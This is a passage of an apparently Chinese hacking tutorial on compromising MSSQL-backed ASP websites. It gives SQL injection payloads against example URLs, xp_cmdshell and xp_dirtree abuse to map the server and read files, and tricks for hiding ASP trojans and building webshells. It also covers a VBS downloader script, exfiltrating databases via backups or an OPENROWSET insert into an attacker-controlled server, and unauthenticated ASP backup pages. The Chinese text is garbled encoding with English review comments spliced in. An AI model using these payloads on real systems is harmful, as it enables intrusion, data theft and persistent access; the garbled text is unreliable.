;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

鍦ㄨ繘琛屼笅闈㈢殑鎿嶄綔鍓嶏紝鍏堟煡鐪婦鐩樻湁鍑犱釜鏂囦歡澶癸紝榪欐牱瀵笵鐩樻湁涓ぇ鑷寸殑浜嗚В錛岃鍙ュ涓嬶細
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?))>=鏁板瓧(鏁板瓧=0銆?銆?銆?...)

鎺ョ潃錛屾垜浠湪瀵規柟鐨勭綉绔欎笂鎵懼嚑涓竴綰у瓙鐩綍錛屽user銆乸hoto錛岀劧鍚庯紝鐢ㄧ瓫閫夌殑鏂規硶鏉ュ垽鏂璚EB鏍圭洰褰曚笂鏄惁瀛樺湪姝ょ洏涓婏紝璇彞濡備笅錛?
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)

鐪嬭鍙ョ殑榪斿洖緇撴灉錛屽鏋滀負鐪燂紝琛ㄧずWEB鏍圭洰褰曟湁鍙兘鍦ㄦ鐩樹笂錛屼負浜嗚繘涓姝ョ‘璁わ紝澶氭祴璇曞嚑涓瓙鐩綍錛?
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)

...

濡傛灉鎵鏈夌殑嫻嬭瘯緇撴灉閮戒負鐪燂紝琛ㄧずWEB鏍圭洰褰曞緢鏈夊彲鑳藉湪姝ょ洏涓娿?

涓嬮潰鍋囪鎵懼埌鐨刉EB鏍圭洰褰曞湪姝ょ洏涓婏紝鐢ㄤ互涓嬬殑璇彞鏉ヨ幏寰椾竴綰у瓙鐩綍鐨勬繁搴︼細
and (select depth from temp where dir='user')>=鏁板瓧(鏁板瓧=1銆?銆?...)

鍋囪寰楀埌鐨刣epth鏄?,璇存槑user鐩綍鏄疍鐩樼殑3綰х洰褰曪紝鍒橶EB鏍圭洰褰曟槸D鐩樼殑浜岀駭鐩綍銆?

鐩墠鎴戜滑宸茬粡鐭ラ亾浜嗘牴鐩綍鎵鍦ㄧ殑鐩樼鍜屾繁搴︼紝瑕佹壘鍒版牴鐩綍鐨勫叿浣撲綅緗紝鎴戜滑鏉ヤ粠D鐩樻牴鐩綍寮濮嬮愪竴鎼滃錛屽綋鐒訛紝娌℃湁蹇呰鐭ラ亾姣忎釜鐩綍鐨勫悕縐幫紝鍚﹀垯澶楄垂鏃墮棿浜嗐?

鎺ヤ笅鏉ワ紝鍙﹀寤虹珛涓涓復鏃惰〃錛岀敤鏉ュ瓨鏀綝鐩樼殑1綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰曪紝璇彞濡備笅錛?

;create table temp1(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑絎竴涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑絎簩涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝鍙渶鎶婄浜屼釜top 1鏀逛負top 2灝辮浜嗐?

鐜板湪錛宼emp1涓凡緇忎繚瀛樹簡鎵鏈塂鐩樼涓綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰?鐒跺悗錛屾垜浠敤鍚屾牱鐨勬柟娉曟潵鍒ゆ柇鏍圭洰褰曟槸鍚﹀湪姝や竴綰у瓙鐩綍涓嬶細
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
濡傛灉榪斿洖涓虹湡錛岃〃紺烘牴鐩綍鍙兘鍦ㄦ瀛愮洰褰曚笅錛岃浣忚澶氭祴璇曞嚑涓緥瀛愶紝濡傛灉閮借繑鍥炰負鍋囷紝鍒欒〃鏄嶹EB鏍圭洰褰曚笉鍦ㄦ鐩綍涓嬶紝鐒跺悗鎴戜滑鍦ㄧ敤鍚屾牱鐨勬柟娉曟潵鑾峰緱D鐩樼2銆?...涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞垪琛紝鏉ュ垽鏂璚EB鏍圭洰褰曟槸鍚﹀湪鍏朵笅銆備絾鏄紝瑕佹敞鎰忥紝鐢▁p_dirtree鍓嶄竴瀹氳鎶妕emp1琛ㄤ腑鐨勫唴瀹瑰垹闄ゃ?

鐜板湪鍋囪錛學EB鏍圭洰褰曞湪D鐩樼殑絎竴綰у瓙鐩綍涓嬶紝璇ュ瓙鐩綍鍚嶇О涓簑ebsite,鎬庢牱鑾峰緱榪欎釜鐩綍鐨勫悕縐版垜鎯充笉鐢ㄦ垜璇翠簡鍚с傚洜涓哄墠闈㈡垜浠煡閬撲簡WEB鏍圭洰褰曠殑娣卞害涓?錛屾垜浠渶瑕佺煡閬搘ebsite涓嬪埌搴曞摢涓墠鏄湡姝g殑WEB鏍圭洰褰曘?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曪紝鍐嶅緩绔嬬3涓復鏃惰〃錛?
;create table temp2(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑website涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp2涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑website涓嬬浜屼釜瀛愮洰褰曚笅鐨勬墍鏈夌洰褰曞瓨鍒皌emp2涓紝鍙渶鎶婄浜屼釜top 1鏀逛負top 2灝辮浜嗐?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曞垽鏂鐩綍鏄惁涓烘牴鐩綍錛?
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
濡傛灉榪斿洖涓虹湡錛屼負浜嗙‘瀹氭垜浠殑鍒ゆ柇錛屽嫻嬭瘯鍑犱釜渚嬪瓙錛屾柟娉曚笂闈㈤兘璁插埌浜嗭紝濡傛灉澶氫釜渚嬪瓙閮借繑鍥炰負鐪燂紝閭d箞灝辯‘瀹氫簡璇ョ洰褰曚負WEB鏍圭洰褰曘?


鐢ㄤ互涓婄殑鏂規硶鍩烘湰涓婂彲浠ヨ幏寰梂EB鏍圭洰褰曪紝鐜板湪鎴戜滑鍋囪WEB鏍圭洰褰曟槸錛欴:\website\www
鐒跺悗錛屾垜浠氨鍙互澶囦喚褰撳墠鏁版嵁搴撳埌榪欎釜鐩綍涓嬬敤鏉ヤ笅杞姐傚浠藉墠鎴戜滑鎶妕emp銆乼emp1銆乼emp2鐨勫唴瀹規竻絀猴紝鐒跺悗C銆丏銆丒鐩樼殑鐩綍鏍戝垎鍒瓨鍒皌emp銆乼emp1銆乼emp2涓?

涓嬭澆瀹屾暟鎹簱鍚庤璁板緱鎶婁笁涓復鏃惰〃DROP鎺夛紝鐜板湪鎴戜滑鍦ㄤ笅杞界殑鏁版嵁搴撲腑鍙互鎵懼埌鎵鏈夌殑鐩綍鍒楄〃錛屽寘鎷悗鍙扮鐞嗙殑鐩綍浠ュ強鏇村淇℃伅銆?br>
21銆亀in2000涓嬪皢WEB鐢ㄦ埛鎻愬崌涓虹郴緇熺敤鎴鋒潈闄愶紝闇瑕佹湁綆$悊鍛樼殑鏉冮檺鎵嶈兘鎵ц錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

鏌ョ湅鏄惁鎴愬姛錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
鐗堟潈鎵鏈?C) Microsoft Corporation 1996-2001銆備繚鐣欐墍鏈夋潈鍒┿?br>inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

22銆佸浣曢殣钘廇SP鏈ㄩ┈錛?br>寤虹珛闈炴爣鍑嗙洰褰曪細mkdir images..\
鎷瘋礉ASP鏈ㄩ┈鑷崇洰褰曪細copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
閫氳繃web璁塊棶ASP鏈ㄩ┈錛?a href="http://ip/images../news.asp?action=login" target=_blank>http://ip/images../news.asp?action=login
濡備綍鍒犻櫎闈炴爣鍑嗙洰褰曪細rmdir images..\ /s

23銆佸幓鎺塼enlnet鐨刵tlm璁よ瘉錛?br>;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'鈥?br>
24銆佺敤echo鍐欏叆鏂囦歡涓嬭澆鑴氭湰iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25銆佹墜宸ュ緩绔婭IS闅愯棌鐩綍鐨勬柟娉曪細
?   鏌ョ湅鏈湴铏氭嫙鐩綍鍒楄〃錛歝script.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?   鏂板緩涓涓猭iss鐩綍錛歮kdir c:\asp\kiss
?   寤虹珛kiss铏氭嫙鐩綍錛歝script.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"  
?   涓簁iss鐩綍鍔犳墽琛屽拰鍐欐潈闄愶細
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?   ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?   璁塊棶錛?a target=_blank>http://127.0.0.1/kiss/test.asp

26銆佷嬌鐢╫penrowset()榪炲洖鏈湴鍋氭祴璇曪細
-- Loopback query through the SQLOLEDB provider.  The provider string carries the login and
-- its password in clear text inside the statement itself, so they end up wherever statement
-- text is captured (traces, plan cache, query logs).  The two forms below are equivalent;
-- the first just aliases the derived table.  On SQL Server 2005 and later an OPENROWSET with
-- an ad hoc connection string additionally requires the 'Ad Hoc Distributed Queries'
-- option, which is the knob to leave disabled when this capability is not needed.
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a

SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')

27銆佽幏寰椾富鏈哄悕錛?br>http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28銆佽幏寰楁暟鎹簱鐢ㄦ埛鍚嶏細
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29銆佹櫘閫氱敤鎴瘋幏寰梂EBSHELL鐨勬柟娉曚箣浜岋細
?   鎵撳寘錛?br>EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
瑙e寘錛屽彲浠ョ敤浜庡緱鍒皐ebshell錛?br>?   EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
?   璇諱換鎰忔枃浠跺唴瀹癸紝瑕佹眰鏈塵aster鐨刣bo鏉冮檺錛?br>EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30銆乻a 鏉冮檺涓嬪凡鐭eb璺緞鐩存帴澶囦喚鏁版嵁搴撳埌web璺緞涓?br>
http://www.XXXX.com/FullStory.asp?id=1;backuup database 鏁版嵁搴撳悕 to disk='c:\inetpub\wwwroot\save.db' 鍒欐妸寰楀埌鐨勬暟鎹唴瀹瑰叏閮ㄥ浠藉埌WEB鐩綍涓嬶紝鍐嶇敤HTTP鎶婃鏂囦歡涓嬭澆(褰撶劧棣栭夎鐭ラ亾WEB铏氭嫙鐩綍)銆?br>
?   閬嶅巻緋葷粺鐨勭洰褰曠粨鏋勶紝鍒嗘瀽緇撴灉騫跺彂鐜癢EB铏氭嫙鐩綍錛屽厛鍒涘緩涓涓復鏃惰〃錛歵emp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?   銆鎺ヤ笅鏉ワ細鎴戜滑鍙互鍒╃敤xp_availablemedia鏉ヨ幏寰楀綋鍓嶆墍鏈夐┍鍔ㄥ櫒,騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?   鎴戜滑鍙互閫氳繃鏌ヨtemp鐨勫唴瀹規潵鑾峰緱椹卞姩鍣ㄥ垪琛ㄥ強鐩稿叧淇℃伅鎴栬呭埄鐢▁p_subdirs鑾峰緱瀛愮洰褰曞垪琛?騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
?   鎴戜滑榪樺彲浠ュ埄鐢▁p_dirtree鑾峰緱鎵鏈夊瓙鐩綍鐨勭洰褰曟爲緇撴瀯,騫跺鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 榪欐牱灝卞彲浠ユ垚鍔熺殑嫻忚鍒版墍鏈夌殑鐩綍錛堟枃浠跺す錛夊垪琛?br>?   濡傛灉鎴戜滑闇瑕佹煡鐪嬫煇涓枃浠剁殑鍐呭錛屽彲浠ラ氳繃鎵цxp_cmdsell錛?insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
?   浣跨敤'bulk insert'璇硶鍙互灝嗕竴涓枃鏈枃浠舵彃鍏ュ埌涓涓復鏃惰〃涓傚錛歜ulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'   嫻忚temp灝卞彲浠ョ湅鍒癷ndex.asp鏂囦歡鐨勫唴瀹逛簡錛侀氳繃鍒嗘瀽鍚勭ASP鏂囦歡錛屽彲浠ュ緱鍒板ぇ閲忕郴緇熶俊鎭紝WEB寤鴻涓庣鐞嗕俊鎭紝鐢氳嚦鍙互寰楀埌SA甯愬彿鐨勮繛鎺ュ瘑鐮併?br>
31銆佷竴浜泂ql涓殑鎵╁睍瀛樺偍鐨勬葷粨:
xp_availablemedia 鏄劇ず緋葷粺涓婂彲鐢ㄧ殑鐩樼'C:\' xp_availablemedia
xp_enumgroups 鍒楀嚭褰撳墠緋葷粺鐨勪嬌鐢ㄧ兢緇勫強鍏惰鏄?xp_enumgroups
xp_enumdsn 鍒楀嚭緋葷粺涓婂凡緇忚緗ソ鐨凮DBC鏁版嵁婧愬悕縐?xp_enumdsn
xp_dirtree 鏄劇ず鏌愪釜鐩綍涓嬬殑瀛愮洰褰曚笌鏂囦歡鏋舵瀯 xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails 鑾峰彇鏌愭枃浠剁殑鐩稿叧灞炴?xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 灝嗙洰鏍囪綆楁満澶氫釜妗f鍘嬬緝鍒版煇涓。妗堥噷鎵鍘嬬緝鐨勬。妗堥兘鍙互鎺ュ湪鍙傛暟鐨勫悗闈㈢敤璞嗗彿闅斿紑 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 瑙e帇緙?xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains 鍒楀嚭鏈嶅姟鍣ㄥ煙鍚?xp_ntsec_enumdomains
xp_servicecontrol 鍋滄鎴栬呭惎鍔ㄦ煇涓湇鍔?xp_servicecontrol 'stop','schedule'
xp_terminate_process 鐢╬id鏉ュ仠姝㈡煇涓墽琛屼腑鐨勭▼搴?xp_terminate_process 123
dbo.xp_subdirs 鍙垪鏌愪釜鐩綍涓嬬殑瀛愮洰褰?dbo.xp_subdirs 'C:\'

32銆?br>USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1銆傝幏寰楁墍鏈夌殑瀛樺偍榪囩▼鐨勮剼鏈細
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2銆傝幏寰楁墍鏈夌殑瑙嗗浘鐨勮剼鏈細
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33銆丏B_OWNER鏉冮檺涓嬬殑鏁版嵁搴撳浠芥柟娉?br>鐢╫penrowset鍚с傚弽榪炲埌鑷繁鐨勬暟鎹簱鏈哄櫒錛寏鍏堝湪鏈湴寤轟釜璺熺洰鏍囨満鍣ㄤ竴鏍風粨鏋勭殑琛▇瀛楁綾誨瀷浣跨敤nvarchar.鐒跺悗鐢ㄦ搗媧嬭繛鎺ュ鏂圭殑SQL鏁版嵁搴擄紝鍦ㄦ煡璇㈠垎鏋愰偅閲屾墽琛?br>insert into OPENROWSET ('sqloledb','server=浣犳暟鎹簱鏈嶅姟鍣ㄧ殑IP;uid=user;pwd=pass;database=dbname;','select * from 浣犲緩绔嬬殑琛? select * from 瀵規柟鐨勮〃鈥?br>瑕佹槸鏁版嵁閲忓お澶х殑璇濆氨鐪嬬湅浠栨暟鎹簱閲屾湁娌℃湁鑷姩緙栧彿鐨勫瓧孌?select * from 琛ㄥ悕 where id>100
榪欐牱鏉ュ紕鍚?br>瑕佹槸鍜學EB鍚屽彴鐨勮瘽錛岀洿鎺ュ皢搴揃AK鍒癢EB鐩綍涓嬪洖鏉ュ氨OK鍟︺傘傘備笉榪囧墠鎻愬簱涓嶈兘澶ぇ錛岃秴榪?G鐨勮瘽SQL灝辮秴鏃朵簡
濡傛灉鏄疭A鏉冮檺鍙互鍒╃敤涓嬮潰鐨勪袱涓狝SP紼嬪簭鏉ュ浠芥暟鎹簱錛?br>
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 鏁版嵁搴撶殑澶囦喚涓庢仮澶?lt;/TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
閫夋嫨鎿嶄綔錛?lt;INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>澶囦喚</label>銆
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>鎭㈠</label>
<br>鏁版嵁搴撳悕錛?lt;INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>鏂囦歡璺緞錛?lt;INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞,澶囦喚鎴怑XE涓昏涓轟簡鏂逛究涓嬭澆,媧繪椿..)<br>
<input type="submit" value="紜畾">
</form>
<%
' Backup / restore front end driven by SQL-DMO.  Everything comes from the form above:
' act selects the operation, databasename the database, bak_file the server-side file path.
' Review notes (security):
'  - The SQL login is fixed in the page source ("sa" in this copy) and the page performs no
'    authentication of its own, so anyone who can reach the URL runs backups and restores
'    under that login.
'  - bak_file is taken from the request unvalidated and handed to SQLDMO as the device path,
'    so the caller decides where on the server the backup is written and which file a
'    restore reads.
'  - request("databasename") is echoed into the form above without HTML encoding.
'  - No On Error Resume Next is set on this page, so a failing Connect / SQLBackup /
'    SQLRestore aborts the response before the err.number checks below run; when they do
'    run, the success message is still written afterwards regardless of err.number.
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
' Connection settings: server, login, password.  The next line holds three assignments that
' the extraction joined with <br> markers; the password literal's closing quote is also
' lost, so the line is left as found.
sqlserver = "localhost" 'sql鏈嶅姟鍣?br>sqlname = "sa" '鐢ㄦ埛鍚?br>sqlpassword = "鏁版嵁搴撳瘑鐮? '瀵嗙爜
sqlLoginTimeout = 15 'login timeout
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
' "$1" in the supplied path stands for the database name
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
' NOTE(review): Files is never declared on this page (no Option Explicit), so unless a
' typelib METADATA reference supplies SQLDMO's constants it evaluates to Empty rather
' than the file-device constant -- confirm
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
' written even when the error branch above fired
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act = "restore" then
' Restore only while the database is not in use!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
' same undeclared Files constant as in the backup branch
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
' NOTE(review): this error check runs before SQLRestore is called, so a restore failure is
' never reported here
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv

Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>娌℃湁閫夋嫨鎿嶄綔</font>"
end if
end if
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0 </font></td>
</tr>
<tr>
<td>閫夋嫨鎿嶄綔錛?br>  <input type="radio" name="act" id="act_backup"value="backup" />
  <label for=act_backup>澶囦喚</label>
  <input type="radio" name="act" id="act_restore" value="restore" />
  <label for=act_restore>鎭㈠</label></td>
</tr>
<tr>
<td><label>SQL鏈嶅姟鍣?
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>鐢ㄦ埛鍚?
  <input name="sqlname" type="text" value="sa" />
瀵?鐮?
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>鏁版嵁搴撳悕錛?br>  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>鏂囦歡璺緞錛?br>  <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞)</td>
</tr>
<tr>
<td><% Response.write "鏈枃浠剁粷瀵硅礬寰?" %>
  <font color="#FF0000">
  <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="紜?瀹? />
    <input name="Submit" type="reset" class="liuyes" size="10" value="閲?緗? /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>鎻愮ず淇℃伅:<%
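if request("action")="" then
response.write "<font color=#ff0000>涓嶇敤鎴戝璇翠粈涔堜簡鍚э紒</font>"
end if
' Backup and restore of a SQL Server database through SQLDMO.
'
' NOTE(review): nothing on this page authenticates the caller. The SQL host,
' login, password, database name and the server-side .bak path all come from
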